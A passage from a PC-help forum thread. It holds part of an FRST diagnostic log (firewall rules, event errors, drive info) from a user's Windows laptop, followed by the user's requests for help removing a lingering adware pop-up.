FirewallRules: [{EB6AFAC3-8B24-4589-A769-222FDE858637}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EAF8FD7F-EB75-4956-BB68-EE445CF000BD}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{6A7BD87B-FDB9-471D-B837-5F0CA0AF25FC}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{64E8DD44-72B5-4C87-BA09-FF3B66B3DB69}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{93E9A304-F197-49D0-88F2-6D93E7EE2575}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{4728773D-FDC8-4CEB-93E2-C9F61D930CB0}C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe
FirewallRules: [UDP Query User{8DCDDAD5-23D7-444A-846C-FD0CDDE26606}C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe
FirewallRules: [TCP Query User{3B785730-0933-4217-B41C-0F32C6F71E72}C:\gravity\metal assault\_mas.exe] => (Allow) C:\gravity\metal assault\_mas.exe
FirewallRules: [UDP Query User{E5185BFE-2AAD-4DA2-A8E0-09054DA05AAC}C:\gravity\metal assault\_mas.exe] => (Allow) C:\gravity\metal assault\_mas.exe
FirewallRules: [{8348B51C-1C6E-4B30-85DA-05CBE5BA56A3}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{3859AC58-5AAB-466E-A2C6-FBEDCBE84D86}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{198842D4-19CE-4F8F-AC3D-3A9C9A4314A4}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{F7085040-A7D3-46C0-A6BF-E8BD17EE37F3}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{346E14B8-7417-49C5-972E-3B37DF4EFAA0}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{0CB777D8-C22F-4ECD-A1FE-AF435257126A}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{92811DDD-364A-4AAA-A771-BAA200791A47}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{D55DC355-EDF5-41B2-AF4D-950A6EA041B3}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{16FCA779-C8C6-487F-AD57-8711B547CE28}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{EF5805E9-F9EA-441C-9EA4-6C43FEA1C48E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{605DCB0A-602D-4B6F-A32D-8920AA6F3F54}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{E990AAAA-39C1-4A24-8425-4CA838C5C95E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{5F9E07AA-0CEB-44C0-A5D8-D52D66EC5AF4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{B892D7FD-AF12-4992-92F2-36E42D0C1819}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{27CEEF2E-0499-4454-BB13-0BB623A779D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{8A1D2AC0-9996-49C5-8476-4ACED39DB85C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{6073E1D9-B584-4487-81BB-F57A3E955133}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{68A3A141-50A2-4129-B525-3EC138B291C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{E24C04F6-5B3B-4D33-A65E-40F569775347}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{0EFF19AE-31B9-4C17-BE44-9394E410BAD3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{3FDFB0EB-EC6B-4FBE-9A4C-9FC48723CAD4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [TCP Query User{9CA87EC9-E448-4BBF-9CCB-BE988B049CD3}D:\catia\intel_a\code\bin\cnext.exe] => (Allow) D:\catia\intel_a\code\bin\cnext.exe
FirewallRules: [UDP Query User{501E8688-2790-4D7A-9025-9E85B66DA65E}D:\catia\intel_a\code\bin\cnext.exe] => (Allow) D:\catia\intel_a\code\bin\cnext.exe
FirewallRules: [{47119E49-B854-42F1-8877-762A6DA42690}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{8A9B979B-B702-4B1F-AADF-4AF65D5A72D9}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{6F6E231B-25F0-423D-90DE-B19F2AF59FC7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EF28E611-3211-4134-950A-5AEE73D98FB7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ADCAEBB3-0D6D-40B1-8B17-C82EFC2CCD3A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{D8D4BE7C-6815-4933-87EB-522FA7990BBC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{3262B55A-0D53-4D72-8645-C92CEB8782C9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8D7EEE67-A924-4CEF-BA8A-3DFC4FD0CC50}] => (Allow) D:\7coop\Black Desert\bin\BlackDesert32.exe
FirewallRules: [{27F03A13-1C9A-4683-90B3-BFB35FB454D8}] => (Allow) D:\7coop\Black Desert\bin64\BlackDesert64.exe
FirewallRules: [{1D411FC5-BD54-4857-AF9C-0A50CD38A986}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [{48C20724-187C-4C92-B288-28BF0ED03E32}] => (Allow) D:\7coop\Black Desert\BlackDesert_Downloader.exe
FirewallRules: [{ECEFC96A-6FF3-4E79-87F3-98BDB0ED75F2}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [{25ED5881-72D8-4C72-A598-35B65CF520FB}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [{47654C0D-8B84-4466-9565-B480BD85BF23}] => (Allow) D:\7coop\Black Desert\BlackDesert_Downloader.exe
FirewallRules: [{C035D913-9638-472F-986D-11D515A64677}] => (Allow) D:\7coop\Black Desert\BlackDesert_Downloader.exe
FirewallRules: [{80C7715E-E616-4AA4-9BDE-8AB292651F63}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [TCP Query User{EFB317AF-AF29-40A5-B46E-7D3728D85E8D}C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [UDP Query User{C204C617-8098-432F-8B2D-3BBD20F6C05C}C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [TCP Query User{39105BB1-B79A-4A11-851D-B7379FDCD8ED}C:\program files (x86)\internet download manager\idman.exe] => (Allow) C:\program files (x86)\internet download manager\idman.exe
FirewallRules: [UDP Query User{A44B8369-FB4B-4529-B512-33AA8EDA93B0}C:\program files (x86)\internet download manager\idman.exe] => (Allow) C:\program files (x86)\internet download manager\idman.exe
FirewallRules: [{123B3FE2-F3A6-4FBA-9565-ED51A36B6614}] => (Allow) C:\Users\taurus silver\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{EC2FBD6E-1755-49EE-860D-5A40F7D75C05}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{5AD3394E-EE45-4BC7-A00C-887C32B8DBB0}] => (Allow) LPort=2869
FirewallRules: [{21104A78-EE13-43EC-92FA-97D50EAF19F6}] => (Allow) LPort=1900
FirewallRules: [{40E9CD68-0B38-450A-AB2D-8BF98885027A}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{77D4B01A-2878-4811-82DF-2FB2141058DB}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{B0EDDC8C-46D2-4666-8EFC-3EDD431F3A2A}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{57D80AC7-57EE-49AD-9E71-D47BA6AAC997}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{0962CBA8-4B98-4866-9146-5BD1224058C9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{CE447477-669E-41BF-B601-F3AB07461F0B}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{85B08B11-1A31-4F3A-B55B-5FE603900EE7}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{1C3E895C-D7D0-49DD-B52C-A632C62638D1}] => (Allow) D:\7coop\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{35BCB42C-73A8-4665-BB27-BBB3D1675A1D}] => (Allow) D:\7coop\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{D5D5C8CE-EDB6-498C-A912-B395EE98167A}] => (Allow) C:\Users\taurus silver\AppData\Roaming\Nox\bin\Nox.exe
FirewallRules: [{56C8B97F-A608-4324-A4EB-32FEDE87B9E1}] => (Allow) C:\Program Files\Bignox\BigNoxVM\RTNoxVMHandle.exe
FirewallRules: [{DD457E9D-223B-4438-8247-012494E82541}] => (Allow) C:\Program Files\SoftEther VPN Client Manager\vpncmgr_x64.exe
FirewallRules: [{5D596396-D0C1-4B6E-A60E-320A79BB5B59}] => (Allow) C:\Program Files\SoftEther VPN Client Manager\vpncmd_x64.exe
FirewallRules: [{C169D2BB-7606-4A63-BC70-DD0C28054BA7}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe
FirewallRules: [{665B67D4-9B7A-4B3D-888F-7BEB0C5ED9CF}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
FirewallRules: [{5CA15B8B-610E-4C33-8825-134100BB8A27}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe
FirewallRules: [{34B85E76-C9B1-4D52-BF05-01E106B2A203}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
FirewallRules: [{F735039E-FEF8-44FC-BA59-BAD198BDD46A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe
FirewallRules: [{28851842-9207-4081-BC09-2D4290DFC26C}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe
FirewallRules: [{E5701367-E20C-458C-8492-7E5D983A93F7}] => (Block) %ProgramFiles% (x86)\Avira\VPN\Avira.NetworkBlocker.exe
FirewallRules: [{C1BC47ED-C496-46FA-8EC6-534089B80053}] => (Block) %ProgramFiles% (x86)\Avira\VPN\Avira.VpnService.exe
FirewallRules: [{43E3AE04-8B24-4436-AB85-8C29FACA0B8D}] => (Block) %ProgramFiles% (x86)\Avira\VPN\Avira.WebAppHost.exe
FirewallRules: [{55CA104A-44A2-4CD1-A098-20078A5DF4C9}] => (Block) %ProgramFiles% (x86)\Avira\VPN\OpenVpn\openvpn.exe
FirewallRules: [{249D0009-A32B-40D2-BEAF-2C83A5242621}] => (Allow) C:\WINDOWS\explorer.exe
FirewallRules: [{CFF2325D-1C1E-460B-9DB8-53F07D8CFE92}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{271DC2EF-A038-4A94-9598-037A7853D74D}] => (Allow) D:\7coop\Vendetta Gaming Network\Twin Saga Vendetta\patcher.exe
FirewallRules: [{D8C57B25-D1A2-46CF-A4E9-03D22EBBE734}] => (Allow) C:\Users\taurus silver\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{576529A1-CC8A-447F-A81B-A97A48897B98}] => (Allow) C:\Users\taurus silver\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{CDDB9E56-C703-4E76-8857-6B14E47EFFD1}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{06A079D8-D11C-4DA4-A8A3-E702F29A9DB5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0F9ADCF0-87EF-4AE5-82E2-F1F208A7F3B5}] => (Allow) D:\7coop\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe
FirewallRules: [{BFC507C6-2666-4C03-88BB-625D7972EBE3}] => (Allow) D:\7coop\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe
FirewallRules: [{B7B1726E-C428-4651-B413-EA277D395A07}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{D41F16DD-6DEF-4646-8FF1-A51E38801128}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{2D9D876B-FF50-4CBA-A5C2-655C6FBED13E}] => (Allow) D:\Vendetta Gaming Network\Twin Saga Vendetta\patcher.exe
FirewallRules: [{54CCA648-33C1-4FDF-819B-77C5208E4017}] => (Allow) D:\Vendetta Gaming Network\Twin Saga Vendetta\game.bin
FirewallRules: [{F06DF093-0ABC-4ABF-895A-8B43CB2EC300}] => (Allow) D:\Vendetta Gaming Network\Twin Saga Vendetta\game.bin
 
==================== Restore Points =========================
 
29-10-2016 01:23:36 Scheduled Checkpoint
13-11-2016 21:59:29 Removed Aeria Ignite
24-11-2016 18:37:15 Installed Metal Assault
27-11-2016 23:04:00 Removed ESET Smart Security
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/28/2016 04:31:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000005
Fault offset: 0x000000000002e909
Faulting process id: 0x1084
Faulting application start time: 0x01d248ed2aeb7a60
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: a4cb65b1-3484-49ac-8760-e46e9306eaf4
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (11/28/2016 04:30:48 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 04:27:06 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program egui.exe version 9.0.407.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 11d4
 
Start Time: 01d248ec0a35912a
 
Termination Time: 60000
 
Application Path: C:\Program Files\ESET\ESET Smart Security\egui.exe
 
Report Id: b056483e-b4df-11e6-834e-08626654ee0c
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (11/28/2016 04:22:02 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 04:15:55 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 04:11:39 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 03:37:37 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 03:27:29 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program MSASCui.exe version 4.9.10586.494 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 2500
 
Start Time: 01d248e2a5e3a4dd
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\Windows Defender\MSASCui.exe
 
Report Id: 8842132a-b4d7-11e6-834a-08626654ee0c
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (11/28/2016 03:12:32 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000005
Fault offset: 0x000000000002e909
Faulting process id: 0x1514
Faulting application start time: 0x01d248e22ae8ac16
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 810755cd-6213-428f-8c8a-7d578c461961
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (11/28/2016 03:11:52 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
 
System errors:
=============
Error: (11/28/2016 04:32:26 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {5DC4F9AD-3A2B-4DF4-AC39-3FF5A19FCF4C} did not register with DCOM within the required timeout.
 
Error: (11/28/2016 04:31:56 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {5DC4F9AD-3A2B-4DF4-AC39-3FF5A19FCF4C} did not register with DCOM within the required timeout.
 
Error: (11/28/2016 04:30:49 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The SysMain service terminated with the following error: 
Access is denied.
 
Error: (11/28/2016 04:30:49 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Thibechmerciph service terminated with the following error: 
The specified module could not be found.
 
Error: (11/28/2016 04:30:47 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: This computer is configured as a member of a workgroup, not as
a member of a domain. The Netlogon service does not need to run in this
configuration.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:23:42 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {5DC4F9AD-3A2B-4DF4-AC39-3FF5A19FCF4C} did not register with DCOM within the required timeout.
 
 
CodeIntegrity:
===================================
  Date: 2016-11-28 03:12:54.858
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-28 00:54:23.161
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-10-17 14:17:01.415
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-10 00:21:16.213
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-08 22:55:32.868
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-05 14:52:18.325
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-05 08:13:42.847
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-08-29 19:59:05.225
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-08-12 10:15:29.282
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-08-10 23:28:51.649
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-5500U CPU @ 2.40GHz
Percentage of memory in use: 32%
Total physical RAM: 12190.58 MB
Available physical RAM: 8241.27 MB
Total Virtual: 14110.58 MB
Available Virtual: 10346.96 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:186.3 GB) (Free:38.5 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:258.35 GB) (Free:74 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 749E2C35)
 
Partition: GPT.
 
========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 749E2C19)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

  • 0

#4
uwek007

uwek007

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

please help me to get rid of this pop up.. thank you


  • 0

#5
uwek007

uwek007

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

i ran some of the MBAM and AdwCLeaner .. now only this one pop up left
1.png

 

so how do i clear only this one above?


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP